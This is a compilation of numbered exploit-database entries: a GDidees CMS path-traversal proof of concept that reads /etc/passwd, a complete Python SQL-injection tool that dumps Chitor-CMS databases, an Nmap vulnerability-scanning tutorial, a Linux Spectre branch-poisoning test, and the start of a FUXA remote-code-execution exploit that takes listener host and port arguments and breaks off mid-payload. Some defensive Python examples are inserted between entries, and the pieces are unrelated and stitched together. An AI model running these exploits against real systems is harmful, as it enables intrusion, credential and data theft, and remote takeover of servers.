     Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
  7. # Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
     # Date: 03/27/2023
     # Exploit Author: Hadi Mene
     # Vendor Homepage: https://www.gdidees.eu/
     # Software Link: https://www.gdidees.eu/cms-1-0.html
     # Version: 3.9.1 and earlier
     # Tested on: Debian 11
     # CVE: CVE-2023-27179

     ### Summary:
     GDidees CMS v3.9.1 and lower versions were discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.

     ### Description:
     imgdownload.php is mainly used by the QR code generation module to download a QR code. The vulnerability occurs in line 4, where the filename parameter, which will be opened later, is not filtered or sanitized. Furthermore, there is no admin session check in this code as there should be, since only the admin user should normally be able to download a QR code.

     Vulnerable code:
     ```php
     3.  if (isset($_GET["filename"])) {
     4.      $filename=$_GET["filename"];
         .....
         .....
     27.     @readfile($filename) OR die();
     ```

     ### POC:
     URL: https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd

     Exploitation using curl:
     ```
     # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
     root:x:0:0:root:/root:/bin/bash
     daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
     bin:x:2:2:bin:/bin:/usr/sbin/nologin
     sys:x:3:3:sys:/dev:/usr/sbin/nologin
     sync:x:4:65534:sync:/bin:/bin/sync
     games:x:5:60:games:/usr/games:/usr/sbin/nologin
     man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
     lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
     mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
     news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
     uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
     proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
     www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
     backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
     list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
     irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
     gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
     nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
     _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
     systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
     systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
     systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
     ntp:x:104:110::/nonexistent:/usr/sbin/nologin
     messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
     uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
     pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
     lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
     hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
     systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
     vboxadd:x:998:1::/var/run/vboxadd:/bin/false
     openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
     sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
     mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
     ```

     ### References:
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
     https://nvd.nist.gov/vuln/detail/CVE-2023-27179
     https://www.exploit-db.com/papers/12883
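A hardened model of the handler described above, written in Python as an added example (the CMS itself is PHP and this is not its code): it adds the two checks the description says are missing, an admin-session check and containment of the `filename` parameter inside the QR image directory, before anything is read back to the client. The directory name `qrcodes` and the function names are assumptions of this example.

```python
import os
import tempfile
from typing import Dict, Optional, Tuple

# Assumed name of the directory the QR module writes its images to; the real CMS path is not on the page.
QR_DIR_NAME = "qrcodes"


def resolve_download(base_dir: str, filename: str) -> Optional[str]:
    """Map the user-supplied `filename` to a path inside base_dir, or None if it escapes.

    realpath() collapses '..' and symlinks before the containment check, so
    '../../../../etc/passwd', an absolute path, or a symlink planted inside the
    directory all fail the same test instead of each needing its own filter.
    """
    if not filename or "\x00" in filename:          # NUL bytes truncate paths in C-level APIs
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def handle_imgdownload(session: Dict, params: Dict, base_dir: str) -> Tuple[int, bytes]:
    """Model of imgdownload.php with the missing checks: session, then containment, then read."""
    if not session.get("admin"):
        return 403, b""                               # the original had no session check at all
    filename = params.get("filename")
    if not filename:
        return 400, b""
    path = resolve_download(base_dir, filename)
    if path is None or not os.path.isfile(path):
        return 404, b""                               # same answer whether the target is outside or absent
    with open(path, "rb") as fh:
        return 200, fh.read()


def make_fixture() -> str:
    """Constructed test fixture: a temporary QR directory holding one image file."""
    base = os.path.realpath(tempfile.mkdtemp())
    qr_dir = os.path.join(base, QR_DIR_NAME)
    os.mkdir(qr_dir)
    with open(os.path.join(qr_dir, "qr.png"), "wb") as fh:
        fh.write(b"\x89PNG constructed")
    return qr_dir
```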
  8. ```python
     #!/usr/bin/python3
     #######################################################
     #                                                     #
     # Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection
     # Date: 2023/04/13
     # ExploitAuthor: msd0pe
     # Project: https://github.com/waqaskanju/Chitor-CMS
     # My Github: https://github.com/msd0pe-1
     # Patched the 2023/04/16: 69d3442 commit
     #                                                     #
     #######################################################

     __description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
     __author__ = 'msd0pe'
     __version__ = '1.1'
     __date__ = '2023/04/13'


     class bcolors:
         PURPLE = '\033[95m'
         BLUE = '\033[94m'
         GREEN = '\033[92m'
         OCRA = '\033[93m'
         RED = '\033[91m'
         CYAN = '\033[96m'
         ENDC = '\033[0m'
         BOLD = '\033[1m'
         UNDERLINE = '\033[4m'


     class infos:
         INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
         ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
         GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
         PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "


     import re
     import requests
     import optparse
     from prettytable import PrettyTable


     def DumpTable(url, database, table):
         header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
         x = PrettyTable()
         columns = []
         payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
         u = requests.get(url + payload, headers=header)
         try:
             r = re.findall(r"qpzkq\[(.*?)\]qjkbq", u.text)
             r = r[0].replace('\"', "").split(',')
             if r == []:
                 pass
             else:
                 for i in r:
                     columns.append(i)
             pass
         except:
             pass
         x.field_names = columns
         payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[", "").replace("]", "").replace("\'", "").replace(" ", "") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
         u = requests.get(url + payload, headers=header)
         try:
             r = re.findall(r"qpzkq\[(.*?)\]qjkbq", u.text)
             r = r[0].replace('\"', "").split(',')
             if r == []:
                 pass
             else:
                 for i in r:
                     i = i.split("xzmdpl")
                     x.add_rows([i])
         except ValueError:
             r = re.findall(r"qpzkq\[(.*?)\]qjkbq", u.text)
             r = r[0].replace('\"', "").split(',')
             if r == []:
                 pass
             else:
                 for i in r:
                     i = i.split("xzmdpl")
                     i.append("")
                     x.add_rows([i])
         print(x)


     def ListTables(url, database):
         header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
         x = PrettyTable()
         x.field_names = ["TABLES"]
         payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
         u = requests.get(url + payload, headers=header)
         try:
             r = re.findall(r"qpzkq\[(.*?)\]qjkbq", u.text)
             r = r[0].replace('\"', "").split(',')
             if r == []:
                 pass
             else:
                 for i in r:
                     x.add_row([i])
         except:
             pass
         print(x)


     def ListDatabases(url):
         header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
         x = PrettyTable()
         x.field_names = ["DATABASES"]
         payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
         u = requests.get(url + payload, headers=header)
         try:
             r = re.findall(r"qpzkq\[(.*?)\]qjkbq", u.text)
             r = r[0].replace('\"', "").split(',')
             if r == []:
                 pass
             else:
                 for i in r:
                     x.add_row([i])
         except:
             pass
         print(x)


     def Main():
         Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
         Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
         Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
         Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
         Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
         Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
         Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
         (options, args) = Menu.parse_args()
         Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
     python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
     python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
     """)
         Menu.add_option_group(Examples)
         if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
             Menu.print_help()
             print('')
             print(' %s' % __description__)
             print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
             print(' Any malicious or illegal activity may be punishable by law')
             print(' Use at your own risk')
         elif len(args) == 0:
             try:
                 if options.url != None:
                     if options.l_databases != None:
                         ListDatabases(options.url)
                     if options.database != None:
                         if options.l_tables != None:
                             ListTables(options.url, options.database)
                         if options.table != None:
                             if options.dump != None:
                                 DumpTable(options.url, options.database, options.table)
             except:
                 print("Unexpected error")


     if __name__ == '__main__':
         try:
             Main()
         except KeyboardInterrupt:
             print()
             print(infos.PROCESS + "Exiting...")
             print()
             exit(1)
     ```
9. A little-known part of Nmap is NSE, the Nmap Scripting Engine, which is one of the most powerful and flexible features of Nmap. It allows users to write (and share) simple scripts to automate various network tasks. Nmap has a comprehensive collection of NSE scripts built in, which users can easily use, but users can also use NSE to create custom scripts to meet their own needs.

Here I will show two similar prefabricated NSE scripts, nmap-vulners and vulscan, at the same time. These two scripts are designed to enhance Nmap's version detection by generating relevant CVE information for specific services such as SSH, RDP, SMB, etc.

CVE, or Common Vulnerabilities and Exposures, is a method used by security researchers to leverage databases to catalog and reference individual vulnerabilities. For example, Exploit Database is a popular database that publicly discloses vulnerabilities. Exploit-DB uses CVE to compile individual vulnerabilities and those associated with specific versions of services such as "SSH v7.2". Here is a screenshot of such an exploit listing on the Exploit-DB website. Please note the CVE number assigned to this particular SSH vulnerability.

Both nmap-vulners and vulscan use CVE records to enhance Nmap's version detection. Nmap will identify the version information of the scanned service. The NSE script will take that information and list the known CVEs that could be used to exploit the service, making it easier to find vulnerabilities.

Below is an example of Nmap version detection without using NSE scripts. Nmap found an SSH service on port 22 running version "OpenSSH 4.3".

```
nmap -sV -p22 1##.##.###.##.##21

Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.### .#21
Host is up (0.58s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
```

Here is an example of the same server scanned with the NSE scripts. We can now see that much more information is output.

```
nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p22 1##.##.###.##.#21

Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.### .#21
Host is up (0.54s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:4.3:
|       CVE-2006-5051   9.3     https://vulners.com/cve/CVE-2006-5051
|       CVE-2006-4924   7.8     https://vulners.com/cve/CVE-2006-4924
|       CVE-2007-4752   7.5     https://vulners.com/cve/CVE-2007-4752
|       CVE-2010-4478   7.5     https://vulners.com/cve/CVE-2010-4478
|       CVE-2014-1692   7.5     https://vulners.com/cve/CVE-2014-1692
|       CVE-2009-2904   6.9     https://vulners.com/cve/CVE-2009-2904
|       CVE-2008-4109   5.0     https://vulners.com/cve/CVE-2008-4109
|       CVE-2007-2243   5.0     https://vulners.com/cve/CVE-2007-2243
|       CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
|       CVE-2006-5052   5.0     https://vulners.com/cve/CVE-2006-5052
|       CVE-2010-5107   5.0     https://vulners.com/cve/CVE-2010-5107
|       CVE-2010-4755   4.0     https://vulners.com/cve/CVE-2010-4755
|       CVE-2012-0814   3.5     https://vulners.com/cve/CVE-2012-0814
|       CVE-2011-5000   3.5     https://vulners.com/cve/CVE-2011-5000
|       CVE-2011-4327   2.1     https://vulners.com/cve/CVE-2011-4327
|_      CVE-2008-3259   1.2     https://vulners.com/cve/CVE-2008-3259
| vulscan: scipvuldb.csv:
| [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
| [39331] OpenBSD 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
| [32512] OpenBSD OpenSSH up to 4.3 unknown vulnerability
| [43307] OpenBSD 4.0 unknown vulnerability
| [41835] OpenBSD up to 4.8 unknown vulnerability
| [38743] OpenBSD up to 4.6 unknown vulnerability
| [36382] OpenBSD OpenSSH up to 4.6 information disclosure
| [32699] OpenBSD OpenSSH 4.1 denial of service
| [2667] OpenBSD OpenSSH 4.4 Separation Monitor Designfehler
| [2578] OpenBSD OpenSSH up to 4.4 Singal race condition
| [32532] OpenBSD OpenSSH 4.5 packet.c denial of service
| [1999] OpenBSD OpenSSH up to 4.2pl scp system() Designfehler
| [1724] OpenBSD OpenSSH 4.0 GSSAPIDelegateCredentials Designfehler
| [1723] OpenBSD OpenSSH 4.0 Dynamic Port Forwarding Designfehler
| [26219] OpenBSD OpenSSH up to 4.1 pl information disclosure
| [16020] OpenBSD OpenSSH 4.5 Format String
```

The `nmap-vulners` NSE script reports a dozen CVEs disclosed over the past few years. nmap-vulners' CVEs are ordered by severity: "9.3" is the worst and sits at the top of the list, so it is the one worth studying first. The vulscan NSE script (after all the CVEs) also reports a dozen interesting vulnerabilities related to OpenSSH v4.3. Both NSE scripts present useful information about vulnerable services well. Every time we use the NSE scripts, nmap-vulners will query the Vulners exploit database. Vulscan, on the other hand, queries the local database on our computer, which was preconfigured when we first downloaded vulscan.

# Step 1
## Installation: Nmap-Vulners

To install the nmap-vulners script, we first use cd to change to the Nmap script directory.

```
cd /usr/share/nmap/scripts/
```

Then, clone the nmap-vulners GitHub repository by typing the following command in the terminal. That is all it takes to install nmap-vulners; no configuration is required after installation.

```
git clone https://github.com/vulnersCom/nmap-vulners.git
```

# Step 2
## Installation: Vulscan

To install vulscan, we also need to clone its GitHub repository into the Nmap script directory. Use the following command to do this.

```
git clone https://github.com/scipag/vulscan.git
```

As mentioned earlier, vulscan uses preconfigured databases stored locally on our computer. We can view these databases in the root of the vulscan directory. Run the following ls command to list the available databases.

```
ls vulscan/*.csv

vulscan/cve.csv
vulscan/exploitdb.csv
vulscan/openvas.csv
vulscan/osvdb.csv
vulscan/scipvuldb.csv
vulscan/securityfocus.csv
vulscan/securitytracker.csv
vulscan/xforce.csv
```

### Vulscan supports many excellent exploit databases:

- scipvuldb.csv
- cve.csv
- osvdb.csv
- securityfocus.csv
- securitytracker.csv
- xforce.csv
- exploitdb.csv
- openvas.csv

To ensure that the databases are completely up to date, we can use the updateFiles.sh script in the vulscan/utilities/updater/ directory. Switch to the updater directory by typing the following command in the terminal.

```
cd vulscan/utilities/updater/
```

Then, use the following chmod command to make sure that the file has the appropriate permissions to execute on your computer.

```
chmod +x updateFiles.sh
```

We can then execute the script by typing the following command in our terminal.

```
./updateFiles.sh
```

Once that is done, we can start using the NSE scripts.

# Step 3
## Scan with Nmap-Vulners

Using NSE scripts is simple. All we have to do is add the --script parameter to our Nmap command and tell Nmap which NSE script to use. To use the nmap-vulners script, we use the following command. Of course, change the #s after -p to the port to scan and the following #s to the IP address you are using.

```
nmap --script nmap-vulners -sV -p### #.###.####.#####
```

The -sV is absolutely necessary. With -sV, we tell Nmap to detect version information for the target address. If Nmap does not produce version information, nmap-vulners will have no data with which to query the Vulners database. Always use -sV when using these NSE scripts.

```
nmap --script nmap-vulners -sV -p80 1##.##.###.##.#24
```

Here is one example of vulscan in use:

```
nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV -p22 1##.##.###.##.#43

Starting Nmap 7.60 ( https://nmap.org )
Nmap scan report for 1##.##.###.##.#43
Host is up (0.52s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
| vulscan: exploitdb.csv:
| [2444] OpenSSH=4.3 pl (Duplicated Block) Remote Denital of Service Exploit
| [21402] OpenSSH s.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [3303] Portable OpenSSH=3.6.1p-PAM/4.1-SUSE Timing Attack Exploit
```

As the chief architects of VulDB, the vulscan developers usually spend their time updating the scipvuldb.csv database file. Querying that database may yield the best results when using the vulscan NSE script.

# Step Five
## Merge into one command

As a security scanner, NSE scripts significantly improve Nmap's versatility, scope and resourcefulness. To make full use of Nmap's version scanning, we can use both nmap-vulners and vulscan in one command. To do this, type the following command in the terminal.

```
nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p### #.###.###.####.####
```
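As an added example (not part of the post above or of the nmap-vulners project), here is a small triage helper that parses the plain-text `| vulners:` block Nmap prints, keeps the CPE each CVE belongs to, and ranks the findings by their CVSS column so the "9.3" entries the post says to study first come out on top. The sample scan text is a constructed, trimmed copy of the OpenSSH 4.3 output shown above.

```python
import re
from dataclasses import dataclass

# Constructed sample: a trimmed copy of the OpenSSH 4.3 scan output quoted above
SAMPLE_OUTPUT = """\
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:4.3:
|       CVE-2006-5051   9.3     https://vulners.com/cve/CVE-2006-5051
|       CVE-2006-4924   7.8     https://vulners.com/cve/CVE-2006-4924
|       CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
|_      CVE-2008-3259   1.2     https://vulners.com/cve/CVE-2008-3259
"""

# One finding line: "|  CVE-YYYY-NNNN  <score>  <url>"; the last line of a block starts with "|_"
FINDING_RE = re.compile(
    r"^\|_?\s+(?P<cve>CVE-\d{4}-\d{4,})\s+(?P<score>\d+(?:\.\d+)?)\s+(?P<url>\S+)\s*$"
)


@dataclass(frozen=True)
class Finding:
    cpe: str
    cve: str
    score: float
    url: str


def parse_vulners(text: str) -> list:
    """Return every CVE line found under a `cpe:/...` header, tagged with that CPE."""
    findings = []
    cpe = None
    for line in text.splitlines():
        body = line.lstrip("|_ ").strip()
        if body.startswith("cpe:/"):
            # vulners prints the CPE with a trailing colon; drop it
            cpe = body.rstrip(":")
            continue
        m = FINDING_RE.match(line)
        if m and cpe is not None:
            findings.append(Finding(cpe, m["cve"], float(m["score"]), m["url"]))
    return findings


def severity(score: float) -> str:
    """CVSS v2 qualitative bands, which is the scale of the score column shown above."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


def prioritise(findings: list, min_score: float = 7.0) -> list:
    """Keep findings at or above min_score, worst first, CVE id as the tie-breaker."""
    return sorted(
        (f for f in findings if f.score >= min_score),
        key=lambda f: (-f.score, f.cve),
    )


def report(text: str, min_score: float = 7.0) -> list:
    """Triage lines for a scan; returned as a list so they can be logged or asserted on."""
    lines = []
    for f in prioritise(parse_vulners(text), min_score):
        lines.append(f"{severity(f.score):6} {f.score:4.1f} {f.cve:15} {f.cpe} {f.url}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_OUTPUT)))
```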
10. ## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation
## Exploit Author: nu11secur1ty
## CVE ID: CVE-2023-1998

## Description

## Summary

The Linux kernel allows userspace processes to enable mitigations by calling prctl with [PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html), which disables the speculation feature, as well as by using seccomp. We had noticed that on VMs of at least one major cloud provider, the kernel still left the victim process exposed to attacks in some cases even after enabling the spectre-BTI mitigation with prctl. The same behaviour can be observed on a bare-metal machine when forcing the mitigation to IBRS on the boot command line.

This happened because when plain IBRS was enabled (not enhanced IBRS), the kernel had some logic that determined that [STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html) was not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy [IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html), the IBRS bit was cleared on returning to userspace for performance reasons, which disabled the implicit STIBP and left userspace threads vulnerable to the cross-thread branch target injection that STIBP protects against.

## Severity

Medium - The kernel failed to protect applications that attempted to protect against Spectre v2, leaving them open to attack from other processes running on the same physical core in another hyperthread.

## Vulnerable code

The bug present in kernel 6.2 (https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196) is an optimization that disables STIBP if the mitigation is IBRS or eIBRS.
However, IBRS doesn't mitigate SMT attacks on userspace as eIBRS does. Setting spectre_v2=ibrs on the kernel boot parameters of a bare-metal machine without eIBRS support also triggers the bug.

```c
/*
 * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
 * STIBP is not required.
 */
if (!boot_cpu_has(X86_FEATURE_STIBP) ||
    !smt_possible ||
    spectre_v2_in_ibrs_mode(spectre_v2_enabled))
        return;
```

## Proof of Concept

The test consists of two processes. The attacker constantly poisons an indirect call to speculatively redirect it to a target address. The victim process measures the mispredict rate and tries to mitigate the attack either by calling prctl or by writing to the MSR directly using a kernel module that exposes MSR read and write operations to userspace. The helpers (`jitForLoop`, `callGadget`, `flush`, `probe`, `THRESHOLD`, `rdmsr_on_cpu`, `wrmsr_on_cpu`, `SetCoreAffinity`, `requestMem`, `copyLeakGadget`, `copyRetGadget`) come from the `utils.h` that accompanies the test and is not reproduced here.

```c
/*
gcc -o victim test.c -O0 -masm=intel -w -DVICTIM
gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL
gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0
gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1
gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2
gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 -DIBPB
gcc -o attacker test.c -O0 -masm=intel -w
*/
#include "utils.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>

#ifndef PRINT_AMMOUNT
#define PRINT_AMMOUNT 1000
#endif

#define IA32_SPEC_CTRL 72

uint8_t *rdiPtr;
uint8_t unused[0x500];
uint8_t probeArray[0x1000] = {2};
uint8_t unuse2[0x500];

uint32_t f1() {}

int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu) {
  volatile uint8_t d;
  unsigned tries = 0;
  unsigned hits = 0;
  unsigned totalHits = 0;
  unsigned totalTries = 0;

  jitForLoop(srcAddress);

  while (1) {
#ifndef VICTIM
    /* attacker: keep training the indirect call towards dstAddress */
    callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
    continue;
#else
#ifdef IBPB
    wrmsr_on_cpu(73, cpu, 1);
#endif
    for (int i = 0; i < 100; i++) {
      d = *dstAddress;
      flush((uint8_t *)&rdiPtr);
      callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
    }
    /* a cache hit on the probe line means the call was mispredicted */
    if (probe(&probeArray[0]) < THRESHOLD) {
      hits++;
      totalHits++;
    }
    totalTries++;
    if (++tries % PRINT_AMMOUNT == 0) {
      printf("Rate: %u/%u MSR[72]=%d\n", hits, tries, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu));
#ifdef MSR
      wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
#endif
      tries = 0;
      hits = 0;
      if (totalTries >= PRINT_AMMOUNT * 10) {
        break;
      }
    }
    usleep(1);
#endif
  }
  printf("Total mispredict rate: %d/%d (%.2f %%)\n", totalHits, totalTries,
         (float)totalHits * 100 / (float)totalTries);
  return 0;
}

int main(int argc, char **argv) {
  uint64_t srcAddress;
  uint64_t dstAddress;
  uint64_t cpu;

  if (argc < 4) {
    printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]);
    printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]);
    return 0;
  }

  srcAddress = (uint64_t)strtoull(argv[1], NULL, 16);
  dstAddress = (uint64_t)strtoull(argv[2], NULL, 16);
  cpu = (uint64_t)strtoull(argv[3], NULL, 16);

  SetCoreAffinity(cpu);

  uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000);
  uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000);

#ifdef PRCTL
  if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0) != 0) {
    perror("prctl");
  }
  printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, 0, 0, 0));
#endif

#ifdef MSR
  printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
  wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
  printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu);
  printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif

  // set up leak gadget into position
#ifdef VICTIM
  rdiPtr = (uint8_t *)f1;
  copyLeakGadget(dstAddress);
#else
  rdiPtr = (uint8_t *)dstAddress;
  copyRetGadget(dstAddress);
#endif

  poison(srcAddress, dstAddress, cpu);

#ifdef MSR
  printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
}
```

## Timeline
**Date reported** to Cloud providers: 31/12/2022

**Date reported** to security@kernel.org: 20/02/2022

**Date fixed:** 10/03/2023 - [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d) - https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d

**Date disclosed:** 12/04/2023

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
11.

```python
# Exploit Title: FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186 (current)

from argparse import RawTextHelpFormatter
import argparse, sys, threading, requests


def main(rhost, rport, lhost, lport):
    # /api/runscript evaluates the "code" field server-side without authentication
    url = "http://" + rhost + ":" + rport + "/api/runscript"
    payload = {
        "headers": {
            "normalizedNames": {},
            "lazyUpdate": "null"
        },
        "params": {
            "script": {
